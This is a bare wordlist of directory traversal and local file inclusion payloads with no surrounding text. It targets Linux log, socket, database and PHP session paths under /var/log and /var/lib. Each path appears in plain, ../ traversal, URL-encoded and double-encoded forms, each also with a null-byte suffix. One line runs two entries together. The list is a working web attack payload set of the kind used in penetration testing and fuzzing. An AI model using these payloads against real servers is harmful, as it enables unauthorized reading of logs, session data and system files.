/var/lib/apache2
../../../var/lib/apache2
..%2F..%2F..%2Fvar%2Flib%2Fapache2
..%2F..%2F..%2Fvar%2Flib%2Fapache2%00
..%252F..%252F..%252Fvar%252Flib%252Fapache2
..%252F..%252F..%252Fvar%252Flib%252Fapache2%00
/var/lib/mongodb/mongod.lock
../../../var/lib/mongodb/mongod.lock
..%2F..%2F..%2Fvar%2Flib%2Fmongodb%2Fmongod.lock
..%2F..%2F..%2Fvar%2Flib%2Fmongodb%2Fmongod.lock%00
..%252F..%252F..%252Fvar%252Flib%252Fmongodb%252Fmongod.lock
..%252F..%252F..%252Fvar%252Flib%252Fmongodb%252Fmongod.lock%00
/var/lib/mysql
../../../var/lib/mysql
..%2F..%2F..%2Fvar%2Flib%2Fmysql
..%2F..%2F..%2Fvar%2Flib%2Fmysql%00
..%252F..%252F..%252Fvar%252Flib%252Fmysql
..%252F..%252F..%252Fvar%252Flib%252Fmysql%00
/var/lib/mysql/
../../../var/lib/mysql/
..%2F..%2F..%2Fvar%2Flib%2Fmysql%2F
..%2F..%2F..%2Fvar%2Flib%2Fmysql%2F%00
..%252F..%252F..%252Fvar%252Flib%252Fmysql%252F
..%252F..%252F..%252Fvar%252Flib%252Fmysql%252F%00
/var/lib/mysql/mysql.sock
../../../var/lib/mysql/mysql.sock
..%2F..%2F..%2Fvar%2Flib%2Fmysql%2Fmysql.sock
..%2F..%2F..%2Fvar%2Flib%2Fmysql%2Fmysql.sock%00
..%252F..%252F..%252Fvar%252Flib%252Fmysql%252Fmysql.sock
..%252F..%252F..%252Fvar%252Flib%252Fmysql%252Fmysql.sock%00
/var/lib/php/session
../../../var/lib/php/session
..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsession
..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsession%00
..%252F..%252F..%252Fvar%252Flib%252Fphp%252Fsession
..%252F..%252F..%252Fvar%252Flib%252Fphp%252Fsession%00
/var/lib/redis/redis.sock
../../../var/lib/redis/redis.sock
..%2F..%2F..%2Fvar%2Flib%2Fredis%2Fredis.sock
..%2F..%2F..%2Fvar%2Flib%2Fredis%2Fredis.sock%00
..%252F..%252F..%252Fvar%252Flib%252Fredis%252Fredis.sock
..%252F..%252F..%252Fvar%252Flib%252Fredis%252Fredis.sock%00
/var/log/alternatives.log
../../../var/log/alternatives.log
..%2F..%2F..%2Fvar%2Flog%2Falternatives.log
..%2F..%2F..%2Fvar%2Flog%2Falternatives.log%00
..%252F..%252F..%252Fvar%252Flog%252Falternatives.log
..%252F..%252F..%252Fvar%252Flog%252Falternatives.log%00
/var/log/apache2/
../../../var/log/apache2/
..%2F..%2F..%2Fvar%2Flog%2Fapache2%2F
..%2F..%2F..%2Fvar%2Flog%2Fapache2%2F%00
..%252F..%252F..%252Fvar%252Flog%252Fapache2%252F
..%252F..%252F..%252Fvar%252Flog%252Fapache2%252F%00
/var/log/apache2/access.log
../../../var/log/apache2/access.log
..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log
..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log%00
..%252F..%252F..%252Fvar%252Flog%252Fapache2%252Faccess.log
..%252F..%252F..%252Fvar%252Flog%252Fapache2%252Faccess.log%00
/var/log/apache2/error.log
../../../var/log/apache2/error.log
..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Ferror.log
..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Ferror.log%00
..%252F..%252F..%252Fvar%252Flog%252Fapache2%252Ferror.log
..%252F..%252F..%252Fvar%252Flog%252Fapache2%252Ferror.log%00
/var/log/apt/
../../../var/log/apt/
..%2F..%2F..%2Fvar%2Flog%2Fapt%2F
..%2F..%2F..%2Fvar%2Flog%2Fapt%2F%00
..%252F..%252F..%252Fvar%252Flog%252Fapt%252F
..%252F..%252F..%252Fvar%252Flog%252Fapt%252F%00
/var/log/apt/history.log
../../../var/log/apt/history.log
..%2F..%2F..%2Fvar%2Flog%2Fapt%2Fhistory.log
..%2F..%2F..%2Fvar%2Flog%2Fapt%2Fhistory.log%00
..%252F..%252F..%252Fvar%252Flog%252Fapt%252Fhistory.log
..%252F..%252F..%252Fvar%252Flog%252Fapt%252Fhistory.log%00
/var/log/audit/audit.log
../../../var/log/audit/audit.log
..%2F..%2F..%2Fvar%2Flog%2Faudit%2Faudit.log
..%2F..%2F..%2Fvar%2Flog%2Faudit%2Faudit.log%00
..%252F..%252F..%252Fvar%252Flog%252Faudit%252Faudit.log
..%252F..%252F..%252Fvar%252Flog%252Faudit%252Faudit.log%00
/var/log/auth.log
../../../var/log/auth.log
..%2F..%2F..%2Fvar%2Flog%2Fauth.log
..%2F..%2F..%2Fvar%2Flog%2Fauth.log%00
..%252F..%252F..%252Fvar%252Flog%252Fauth.log
..%252F..%252F..%252Fvar%252Flog%252Fauth.log%00
/var/log/boot.log
../../../var/log/boot.log
..%2F..%2F..%2Fvar%2Flog%2Fboot.log
..%2F..%2F..%2Fvar%2Flog%2Fboot.log%00
..%252F..%252F..%252Fvar%252Flog%252Fboot.log
..%252F..%252F..%252Fvar%252Flog%252Fboot.log%00
/var/log/btmp
../../../var/log/btmp
..%2F..%2F..%2Fvar%2Flog%2Fbtmp
..%2F..%2F..%2Fvar%2Flog%2Fbtmp%00
..%252F..%252F..%252Fvar%252Flog%252Fbtmp
..%252F..%252F..%252Fvar%252Flog%252Fbtmp%00
/var/log/clamav/freshclam.log
../../../var/log/clamav/freshclam.log
..%2F..%2F..%2Fvar%2Flog%2Fclamav%2Ffreshclam.log
..%2F..%2F..%2Fvar%2Flog%2Fclamav%2Ffreshclam.log%00
..%252F..%252F..%252Fvar%252Flog%252Fclamav%252Ffreshclam.log
..%252F..%252F..%252Fvar%252Flog%252Fclamav%252Ffreshclam.log%00
/var/log/cron
../../../var/log/cron
..%2F..%2F..%2Fvar%2Flog%2Fcron
..%2F..%2F..%2Fvar%2Flog%2Fcron%00
..%252F..%252F..%252Fvar%252Flog%252Fcron
..%252F..%252F..%252Fvar%252Flog%252Fcron%00
/var/log/cups/access_log
../../../var/log/cups/access_log
..%2F..%2F..%2Fvar%2Flog%2Fcups%2Faccess_log
..%2F..%2F..%2Fvar%2Flog%2Fcups%2Faccess_log%00
..%252F..%252F..%252Fvar%252Flog%252Fcups%252Faccess_log
..%252F..%252F..%252Fvar%252Flog%252Fcups%252Faccess_log%00
/var/log/cups/error_log
../../../var/log/cups/error_log
..%2F..%2F..%2Fvar%2Flog%2Fcups%2Ferror_log
..%2F..%2F..%2Fvar%2Flog%2Fcups%2Ferror_log%00
..%252F..%252F..%252Fvar%252Flog%252Fcups%252Ferror_log
..%252F..%252F..%252Fvar%252Flog%252Fcups%252Ferror_log%00
/var/log/dhcpd.log
../../../var/log/dhcpd.log
..%2F..%2F..%2Fvar%2Flog%2Fdhcpd.log
..%2F..%2F..%2Fvar%2Flog%2Fdhcpd.log%00
..%252F..%252F..%252Fvar%252Flog%252Fdhcpd.log
..%252F..%252F..%252Fvar%252Flog%252Fdhcpd.log%00
/var/log/dmesg
../../../var/log/dmesg
..%2F..%2F..%2Fvar%2Flog%2Fdmesg
..%2F..%2F..%2Fvar%2Flog%2Fdmesg%00
..%252F..%252F..%252Fvar%252Flog%252Fdmesg
..%252F..%252F..%252Fvar%252Flog%252Fdmesg%00
/var/log/dovecot.log
../../../var/log/dovecot.log
..%2F..%2F..%2Fvar%2Flog%2Fdovecot.log
..%2F..%2F..%2Fvar%2Flog%2Fdovecot.log%00
..%252F..%252F..%252Fvar%252Flog%252Fdovecot.log
..%252F..%252F..%252Fvar%252Flog%252Fdovecot.log%00
/var/log/exim/mainlog
../../../var/log/exim/mainlog
..%2F..%2F..%2Fvar%2Flog%2Fexim%2Fmainlog
..%2F..%2F..%2Fvar%2Flog%2Fexim%2Fmainlog%00
..%252F..%252F..%252Fvar%252Flog%252Fexim%252Fmainlog
..%252F..%252F..%252Fvar%252Flog%252Fexim%252Fmainlog%00
/var/log/fail2ban.log
../../../var/log/fail2ban.log
..%2F..%2F..%2Fvar%2Flog%2Ffail2ban.log
..%2F..%2F..%2Fvar%2Flog%2Ffail2ban.log%00
..%252F..%252F..%252Fvar%252Flog%252Ffail2ban.log
..%252F..%252F..%252Fvar%252Flog%252Ffail2ban.log%00
/var/log/haproxy.log
../../../var/log/haproxy.log
..%2F..%2F..%2Fvar%2Flog%2Fhaproxy.log
..%2F..%2F..%2Fvar%2Flog%2Fhaproxy.log%00
..%252F..%252F..%252Fvar%252Flog%252Fhaproxy.log
..%252F..%252F..%252Fvar%252Flog%252Fhaproxy.log%00
/var/log/httpd/access_log
../../../var/log/httpd/access_log
..%2F..%2F..%2Fvar%2Flog%2Fhttpd%2Faccess_log
..%2F..%2F..%2Fvar%2Flog%2Fhttpd%2Faccess_log%00
..%252F..%252F..%252Fvar%252Flog%252Fhttpd%252Faccess_log
..%252F..%252F..%252Fvar%252Flog%252Fhttpd%252Faccess_log%00
/var/log/httpd/error.log
../../../var/log/httpd/error.log
..%2F..%2F..%2Fvar%2Flog%2Fhttpd%2Ferror.log
..%2F..%2F..%2Fvar%2Flog%2Fhttpd%2Ferror.log%00
..%252F..%252F..%252Fvar%252Flog%252Fhttpd%252Ferror.log
..%252F..%252F..%252Fvar%252Flog%252Fhttpd%252Ferror.log%00
/var/log/httpd/error_log
../../../var/log/httpd/error_log
..%2F..%2F..%2Fvar%2Flog%2Fhttpd%2Ferror_log
..%2F..%2F..%2Fvar%2Flog%2Fhttpd%2Ferror_log%00
..%252F..%252F..%252Fvar%252Flog%252Fhttpd%252Ferror_log
..%252F..%252F..%252Fvar%252Flog%252Fhttpd%252Ferror_log%00
/var/log/kernel.log
../../../var/log/kernel.log
..%2F..%2F..%2Fvar%2Flog%2Fkernel.log
..%2F..%2F..%2Fvar%2Flog%2Fkernel.log%00
..%252F..%252F..%252Fvar%252Flog%252Fkernel.log
..%252F..%252F..%252Fvar%252Flog%252Fkernel.log%00/var/log/letsencrypt/letsencrypt.log
../../../var/log/letsencrypt/letsencrypt.log
..%2F..%2F..%2Fvar%2Flog%2Fletsencrypt%2Fletsencrypt.log
..%2F..%2F..%2Fvar%2Flog%2Fletsencrypt%2Fletsencrypt.log%00
..%252F..%252F..%252Fvar%252Flog%252Fletsencrypt%252Fletsencrypt.log
..%252F..%252F..%252Fvar%252Flog%252Fletsencrypt%252Fletsencrypt.log%00
/var/log/mail.log
../../../var/log/mail.log
..%2F..%2F..%2Fvar%2Flog%2Fmail.log
..%2F..%2F..%2Fvar%2Flog%2Fmail.log%00
..%252F..%252F..%252Fvar%252Flog%252Fmail.log
..%252F..%252F..%252Fvar%252Flog%252Fmail.log%00
/var/log/maillog
../../../var/log/maillog
..%2F..%2F..%2Fvar%2Flog%2Fmaillog
..%2F..%2F..%2Fvar%2Flog%2Fmaillog%00
..%252F..%252F..%252Fvar%252Flog%252Fmaillog
..%252F..%252F..%252Fvar%252Flog%252Fmaillog%00
/var/log/messages
../../../var/log/messages
..%2F..%2F..%2Fvar%2Flog%2Fmessages
..%2F..%2F..%2Fvar%2Flog%2Fmessages%00
..%252F..%252F..%252Fvar%252Flog%252Fmessages
..%252F..%252F..%252Fvar%252Flog%252Fmessages%00
/var/log/mongodb/mongod.log
../../../var/log/mongodb/mongod.log
..%2F..%2F..%2Fvar%2Flog%2Fmongodb%2Fmongod.log
..%2F..%2F..%2Fvar%2Flog%2Fmongodb%2Fmongod.log%00
..%252F..%252F..%252Fvar%252Flog%252Fmongodb%252Fmongod.log
..%252F..%252F..%252Fvar%252Flog%252Fmongodb%252Fmongod.log%00
/var/log/mysqld.log
../../../var/log/mysqld.log
..%2F..%2F..%2Fvar%2Flog%2Fmysqld.log
..%2F..%2F..%2Fvar%2Flog%2Fmysqld.log%00
..%252F..%252F..%252Fvar%252Flog%252Fmysqld.log
..%252F..%252F..%252Fvar%252Flog%252Fmysqld.log%00
/var/log/mysql/error.log
../../../var/log/mysql/error.log
..%2F..%2F..%2Fvar%2Flog%2Fmysql%2Ferror.log
..%2F..%2F..%2Fvar%2Flog%2Fmysql%2Ferror.log%00
..%252F..%252F..%252Fvar%252Flog%252Fmysql%252Ferror.log
..%252F..%252F..%252Fvar%252Flog%252Fmysql%252Ferror.log%00
/var/log/nginx/
../../../var/log/nginx/
..%2F..%2F..%2Fvar%2Flog%2Fnginx%2F
..%2F..%2F..%2Fvar%2Flog%2Fnginx%2F%00
..%252F..%252F..%252Fvar%252Flog%252Fnginx%252F
..%252F..%252F..%252Fvar%252Flog%252Fnginx%252F%00
/var/log/nginx/access.log
../../../var/log/nginx/access.log
..%2F..%2F..%2Fvar%2Flog%2Fnginx%2Faccess.log
..%2F..%2F..%2Fvar%2Flog%2Fnginx%2Faccess.log%00
..%252F..%252F..%252Fvar%252Flog%252Fnginx%252Faccess.log
..%252F..%252F..%252Fvar%252Flog%252Fnginx%252Faccess.log%00
/var/log/nginx/error.log
../../../var/log/nginx/error.log
..%2F..%2F..%2Fvar%2Flog%2Fnginx%2Ferror.log
..%2F..%2F..%2Fvar%2Flog%2Fnginx%2Ferror.log%00
..%252F..%252F..%252Fvar%252Flog%252Fnginx%252Ferror.log
..%252F..%252F..%252Fvar%252Flog%252Fnginx%252Ferror.log%00
/var/log/ntp.log
../../../var/log/ntp.log
..%2F..%2F..%2Fvar%2Flog%2Fntp.log
..%2F..%2F..%2Fvar%2Flog%2Fntp.log%00
..%252F..%252F..%252Fvar%252Flog%252Fntp.log
..%252F..%252F..%252Fvar%252Flog%252Fntp.log%00
/var/log/openvpn.log
../../../var/log/openvpn.log
..%2F..%2F..%2Fvar%2Flog%2Fopenvpn.log
..%2F..%2F..%2Fvar%2Flog%2Fopenvpn.log%00
..%252F..%252F..%252Fvar%252Flog%252Fopenvpn.log
..%252F..%252F..%252Fvar%252Flog%252Fopenvpn.log%00
/var/log/php/error.log
../../../var/log/php/error.log
..%2F..%2F..%2Fvar%2Flog%2Fphp%2Ferror.log
..%2F..%2F..%2Fvar%2Flog%2Fphp%2Ferror.log%00
..%252F..%252F..%252Fvar%252Flog%252Fphp%252Ferror.log
..%252F..%252F..%252Fvar%252Flog%252Fphp%252Ferror.log%00
/var/log/postgresql/postgresql.log
../../../var/log/postgresql/postgresql.log
..%2F..%2F..%2Fvar%2Flog%2Fpostgresql%2Fpostgresql.log
..%2F..%2F..%2Fvar%2Flog%2Fpostgresql%2Fpostgresql.log%00
..%252F..%252F..%252Fvar%252Flog%252Fpostgresql%252Fpostgresql.log
..%252F..%252F..%252Fvar%252Flog%252Fpostgresql%252Fpostgresql.log%00
/var/log/proftpd/proftpd.log
../../../var/log/proftpd/proftpd.log
..%2F..%2F..%2Fvar%2Flog%2Fproftpd%2Fproftpd.log
..%2F..%2F..%2Fvar%2Flog%2Fproftpd%2Fproftpd.log%00
..%252F..%252F..%252Fvar%252Flog%252Fproftpd%252Fproftpd.log
..%252F..%252F..%252Fvar%252Flog%252Fproftpd%252Fproftpd.log%00
/var/log/puppet/puppet.log
../../../var/log/puppet/puppet.log
..%2F..%2F..%2Fvar%2Flog%2Fpuppet%2Fpuppet.log
..%2F..%2F..%2Fvar%2Flog%2Fpuppet%2Fpuppet.log%00
..%252F..%252F..%252Fvar%252Flog%252Fpuppet%252Fpuppet.log
..%252F..%252F..%252Fvar%252Flog%252Fpuppet%252Fpuppet.log%00
/var/log/redis/redis-server.log
../../../var/log/redis/redis-server.log
..%2F..%2F..%2Fvar%2Flog%2Fredis%2Fredis-server.log
..%2F..%2F..%2Fvar%2Flog%2Fredis%2Fredis-server.log%00
..%252F..%252F..%252Fvar%252Flog%252Fredis%252Fredis-server.log
..%252F..%252F..%252Fvar%252Flog%252Fredis%252Fredis-server.log%00
/var/log/pacman.log
../../../var/log/pacman.log
..%2F..%2F..%2Fvar%2Flog%2Fpacman.log
..%2F..%2F..%2Fvar%2Flog%2Fpacman.log%00
..%252F..%252F..%252Fvar%252Flog%252Fpacman.log
..%252F..%252F..%252Fvar%252Flog%252Fpacman.log%00
/var/log/samba/log.nmbd
../../../var/log/samba/log.nmbd
..%2F..%2F..%2Fvar%2Flog%2Fsamba%2Flog.nmbd
..%2F..%2F..%2Fvar%2Flog%2Fsamba%2Flog.nmbd%00
..%252F..%252F..%252Fvar%252Flog%252Fsamba%252Flog.nmbd
..%252F..%252F..%252Fvar%252Flog%252Fsamba%252Flog.nmbd%00
/var/log/samba/log.smbd
../../../var/log/samba/log.smbd
..%2F..%2F..%2Fvar%2Flog%2Fsamba%2Flog.smbd
..%2F..%2F..%2Fvar%2Flog%2Fsamba%2Flog.smbd%00
..%252F..%252F..%252Fvar%252Flog%252Fsamba%252Flog.smbd
..%252F..%252F..%252Fvar%252Flog%252Fsamba%252Flog.smbd%00
/var/log/secure
../../../var/log/secure
..%2F..%2F..%2Fvar%2Flog%2Fsecure
..%2F..%2F..%2Fvar%2Flog%2Fsecure%00
..%252F..%252F..%252Fvar%252Flog%252Fsecure
..%252F..%252F..%252Fvar%252Flog%252Fsecure%00
/var/log/snort/snort.log
../../../var/log/snort/snort.log
..%2F..%2F..%2Fvar%2Flog%2Fsnort%2Fsnort.log
..%2F..%2F..%2Fvar%2Flog%2Fsnort%2Fsnort.log%00
..%252F..%252F..%252Fvar%252Flog%252Fsnort%252Fsnort.log
..%252F..%252F..%252Fvar%252Flog%252Fsnort%252Fsnort.log%00
/var/log/squid/access.log
../../../var/log/squid/access.log
..%2F..%2F..%2Fvar%2Flog%2Fsquid%2Faccess.log
..%2F..%2F..%2Fvar%2Flog%2Fsquid%2Faccess.log%00
..%252F..%252F..%252Fvar%252Flog%252Fsquid%252Faccess.log
..%252F..%252F..%252Fvar%252Flog%252Fsquid%252Faccess.log%00
/var/log/squid/cache.log
../../../var/log/squid/cache.log
..%2F..%2F..%2Fvar%2Flog%2Fsquid%2Fcache.log
..%2F..%2F..%2Fvar%2Flog%2Fsquid%2Fcache.log%00
..%252F..%252F..%252Fvar%252Flog%252Fsquid%252Fcache.log
..%252F..%252F..%252Fvar%252Flog%252Fsquid%252Fcache.log%00
/var/log/sshd.log
../../../var/log/sshd.log
..%2F..%2F..%2Fvar%2Flog%2Fsshd.log
..%2F..%2F..%2Fvar%2Flog%2Fsshd.log%00
..%252F..%252F..%252Fvar%252Flog%252Fsshd.log
..%252F..%252F..%252Fvar%252Flog%252Fsshd.log%00
/var/log/syslog
../../../var/log/syslog
..%2F..%2F..%2Fvar%2Flog%2Fsyslog
..%2F..%2F..%2Fvar%2Flog%2Fsyslog%00
..%252F..%252F..%252Fvar%252Flog%252Fsyslog
..%252F..%252F..%252Fvar%252Flog%252Fsyslog%00
/var/log/teamviewer/teamviewerd.log
../../../var/log/teamviewer/teamviewerd.log
..%2F..%2F..%2Fvar%2Flog%2Fteamviewer%2Fteamviewerd.log
..%2F..%2F..%2Fvar%2Flog%2Fteamviewer%2Fteamviewerd.log%00
..%252F..%252F..%252Fvar%252Flog%252Fteamviewer%252Fteamviewerd.log
..%252F..%252F..%252Fvar%252Flog%252Fteamviewer%252Fteamviewerd.log%00
/var/log/upstart/
../../../var/log/upstart/
..%2F..%2F..%2Fvar%2Flog%2Fupstart%2F
..%2F..%2F..%2Fvar%2Flog%2Fupstart%2F%00
..%252F..%252F..%252Fvar%252Flog%252Fupstart%252F
..%252F..%252F..%252Fvar%252Flog%252Fupstart%252F%00
/var/log/vsftpd.log
../../../var/log/vsftpd.log
..%2F..%2F..%2Fvar%2Flog%2Fvsftpd.log
..%2F..%2F..%2Fvar%2Flog%2Fvsftpd.log%00
..%252F..%252F..%252Fvar%252Flog%252Fvsftpd.log
..%252F..%252F..%252Fvar%252Flog%252Fvsftpd.log%00
/var/log/wtmp
../../../var/log/wtmp
..%2F..%2F..%2Fvar%2Flog%2Fwtmp
..%2F..%2F..%2Fvar%2Flog%2Fwtmp%00
..%252F..%252F..%252Fvar%252Flog%252Fwtmp
..%252F..%252F..%252Fvar%252Flog%252Fwtmp%00
/var/log/yum.log
../../../var/log/yum.log
..%2F..%2F..%2Fvar%2Flog%2Fyum.log
..%2F..%2F..%2Fvar%2Flog%2Fyum.log%00
..%252F..%252F..%252Fvar%252Flog%252Fyum.log
..%252F..%252F..%252Fvar%252Flog%252Fyum.log%00
/var/log/zabbix/zabbix_server.log
../../../var/log/zabbix/zabbix_server.log
..%2F..%2F..%2Fvar%2Flog%2Fzabbix%2Fzabbix_server.log
..%2F..%2F..%2Fvar%2Flog%2Fzabbix%2Fzabbix_server.log%00
..%252F..%252F..%252Fvar%252Flog%252Fzabbix%252Fzabbix_server.log
..%252F..%252F..%252Fvar%252Flog%252Fzabbix%252Fzabbix_server.log%00
/var/log/zypper.log
../../../var/log/zypper.log
..%2F..%2F..%2Fvar%2Flog%2Fzypper.log
..%2F..%2F..%2Fvar%2Flog%2Fzypper.log%00
..%252F..%252F..%252Fvar%252Flog%252Fzypper.log
..%252F..%252F..%252Fvar%252Flog%252Fzypper.log%00
